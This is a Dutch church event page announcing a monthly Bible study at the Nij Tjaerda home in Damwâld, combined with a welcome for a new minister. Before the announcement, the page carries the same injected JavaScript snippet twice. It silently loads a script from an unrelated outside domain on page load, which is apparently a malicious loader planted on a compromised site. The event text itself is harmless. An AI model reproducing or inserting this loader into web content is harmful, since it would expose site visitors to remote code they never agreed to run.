;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bijbeluurtje Nij Tjaerda met kennismaking met ds. G.J. Otter - PKN Damwâld
12 juni 2018
09:30 t/m 11:00
Nij Tjaerda
Bijbeluurtje Nij Tjaerda met kennismaking met ds. G.J. Otter

Elke tweede dinsdag van de maand is er om 9.30 uur weer het Bijbeluurtje in Nij Tjaerda. We denken samen na over een Bijbels onderwerp. De bijeenkomsten staan open voor alle ouderen uit Damwâld (dus niet alleen voor bewoners van Nij Tjaerda). De leiding berust afwisselend bij ds. S. Boukes en en dhr. J.Y. van der Wal. Bovendien is er voor alle bewoners van Nij Tjaerda en omwonenden bij het maandelijkse Bijbeluurtje een informele kennismaking met ds. G. J. Otter en is er alle gelegenheid om de dominee en zijn vrouw Gods zegen toe te wensen.

Bijbeluur in Nij Tjaerda. Dat doen we daar al jaren op de tweede dinsdagmorgen van de maand om half tien, en dat staat ook open voor mensen van buiten Nij Tjaerda – die horen al jaren bij de vaste bezoekers. We zijn tot ongeveer elf uur bezig met een Bijbelgedeelte. We maken dit jaar de eerste brief aan de Corinthiërs af. Maar we drinken onderwijl ook gezellig koffie met elkaar. Als het u wat lijkt: van harte welkom.

Locatie: Nij TjaerdaDamwald, Badhuisweg, Damwâld